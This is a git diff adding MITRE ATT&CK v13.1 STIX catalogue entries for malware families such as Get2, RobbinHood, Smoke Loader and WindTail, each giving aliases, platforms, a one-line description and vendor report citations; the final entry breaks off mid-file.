a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json new file mode 100644 index 0000000000000000000000000000000000000000..a7e16c8d33c49f78db3fafa3902688cc4c3d1f68 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--099ecff2-41b8-436d-843c-038a9aa9aa69.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a2c60b79-ef3d-4e33-afc4-3be7f7cd5571", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Get2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69", + "type": "malware", + "created": "2020-05-29T20:32:42.686Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0460", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0460" + }, + { + "source_name": "Proofpoint TA505 October 2019", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020." + } + ], + "modified": "2020-06-16T16:48:16.541Z", + "name": "Get2", + "description": "[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json new file mode 100644 index 0000000000000000000000000000000000000000..eb7f68d9f8279d90eeccd1c8f2afc504aa7de15f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--a37f5c27-572e-4861-b9d0-15fb816cc4c1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "POWRUNER" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0184", + "external_id": "S0184" + }, + { + "source_name": "POWRUNER", + "description": "(Citation: FireEye APT34 Dec 2017)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "source_name": "FireEye APT34 Dec 2017" + } + ], + "modified": "2020-07-06T16:11:56.562Z", + "name": "POWRUNER", + "description": "[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json new file mode 100644 index 0000000000000000000000000000000000000000..dfa22d375144f086ffdb2ebbf642236076fed6bc --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a607c53-df52-45da-a75d-0e53df4dad5f.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--886df174-22c0-4c94-b2c1-d202e4a19e8a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RobbinHood" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0a607c53-df52-45da-a75d-0e53df4dad5f", + "type": "malware", + "created": "2019-07-29T14:27:18.204Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0400", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0400" + }, + { + "description": "Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.", + "url": "https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/", + "source_name": "CarbonBlack RobbinHood May 2019" + }, + { + "description": "Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.", + "url": "https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html", + "source_name": "BaltimoreSun RobbinHood May 2019" + } + ], + "modified": "2020-03-30T18:05:52.348Z", + "name": "RobbinHood", + "description": "[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json new file mode 100644 index 0000000000000000000000000000000000000000..def389485b28ba9562cd46582d6cbe00e867a438 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--fdae174c-e682-4ef8-9928-3b580b3d06fc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0177", + "external_id": "S0177" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Power Loader", + "description": "[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json new file mode 100644 index 0000000000000000000000000000000000000000..96b0f5d4fcd2dee4760aea08e44b7627e8039a62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--55a8234a-4d5d-4c6a-88d5-c3e4991793a8", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "TDTESS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0164", + "external_id": "S0164" + }, + { + "source_name": "TDTESS", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "source_name": "ClearSky Wilted Tulip July 2017" + } + ], + "modified": "2020-03-30T18:18:53.335Z", + "name": "TDTESS", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json new file mode 100644 index 0000000000000000000000000000000000000000..aefea8bd390f19934e295cce6a26fe99314a6d78 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--244ce17c-50aa-4337-904f-ce75c7a9b3eb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SharpStage" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a", + "type": "malware", + "created": "2020-12-22T17:02:52.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0546", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0546" + }, + { + "source_name": "SharpStage", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020." + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020." 
+ } + ], + "modified": "2021-08-18T23:48:44.783Z", + "name": "SharpStage", + "description": "[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json new file mode 100644 index 0000000000000000000000000000000000000000..6698859c745f6ca1ea35020b872ff476a4272b67 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--92f89e2c-4e87-493b-b396-6afdd3ab3d27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Smoke Loader", + "Dofoil" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0226", + "external_id": "S0226" + }, + { + "source_name": "Smoke Loader", + "description": "(Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)" + }, + { + "source_name": "Dofoil", + "description": "(Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)" + }, + { + "source_name": "Malwarebytes SmokeLoader 2016", + "description": "Hasherezade. (2016, September 12). Smoke Loader \u2013 downloader with a smokescreen still alive. Retrieved March 20, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/" + }, + { + "source_name": "Microsoft Dofoil 2018", + "description": "Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. 
Retrieved March 20, 2018.", + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/" + } + ], + "modified": "2020-03-28T21:43:37.366Z", + "name": "Smoke Loader", + "description": "[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.\n[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json new file mode 100644 index 0000000000000000000000000000000000000000..9b4e3b4307769cb9a641a77307866d6f5a44c973 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0ced8926-914e-4c78-bc93-356fb90dbd1f.json 
@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--07b813d0-3b3b-4c0b-b69f-4a17bc91c3fc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f", + "type": "malware", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0151", + "external_id": "S0151" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "HALFBAKED", + "description": "[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json new file mode 100644 index 0000000000000000000000000000000000000000..5ba9ab92b72e64db937e05470c6c3dae5d8bef0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--50fabef7-15ce-49a8-8166-1813c5d9cd78", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "WindTail" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541", + "created": "2020-06-04T19:01:53.566Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0466", + "url": "https://attack.mitre.org/software/S0466" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). 
[WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "modified": "2022-04-20T22:03:11.833Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WindTail", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json new file mode 100644 index 0000000000000000000000000000000000000000..c9bb9cd6acb0af472c21ef322bd4211eb7db4eb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--bd23d29f-1b74-487f-8324-eeac231f4fca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:01:41.137Z", + "name": "Misdat", + "description": "[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Misdat" + ], + "type": "malware", + "id": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039", + "created": "2017-05-31T21:32:55.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0083", + "external_id": "S0083" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json new file mode 100644 index 0000000000000000000000000000000000000000..bafd78d23babc23906a2912381605e9d18b1cec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--804445bf-5611-4f0f-bec0-18b529abbe27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FLIPSIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0e18b800-906c-4e44-a143-b11c72b3448b", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0173", + "external_id": "S0173" + }, + { + "source_name": "FLIPSIDE", + "description": "(Citation: Mandiant FIN5 GrrCON Oct 2016)" + }, + { + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "source_name": "Mandiant FIN5 GrrCON Oct 2016" + } + ], + "modified": "2020-03-30T16:24:24.753Z", + "name": "FLIPSIDE", + "description": "[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json new file mode 100644 index 0000000000000000000000000000000000000000..a51f8b039baf02e3a7620f1585ca0afede2c9000 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--36cb875c-2f99-4429-bd58-516978f7a723", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Linux Rabbit" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0efefea5-78da-4022-92bc-d726139e8883", + "type": "malware", + "created": "2019-03-04T17:12:37.586Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0362", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0362" + }, + { + "source_name": "anomali-linux-rabbit", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020." + }, + { + "source_name": "Anomali Linux Rabbit 2018", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "description": "Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019." + } + ], + "modified": "2020-12-22T15:46:17.965Z", + "name": "Linux Rabbit", + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json new file mode 100644 index 0000000000000000000000000000000000000000..dbae826746c2b03736b0be9dfafa41c69ef6fefe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--607f9eef-290b-4ddb-b5ca-4bc04d74249f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_aliases": [ + "adbupd" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0202", + "external_id": "S0202" + }, + { + "source_name": "adbupd", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "source_name": "Microsoft PLATINUM April 2016" + } + ], + "modified": "2020-03-30T18:33:31.623Z", + "name": "adbupd", + "description": "[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)", + 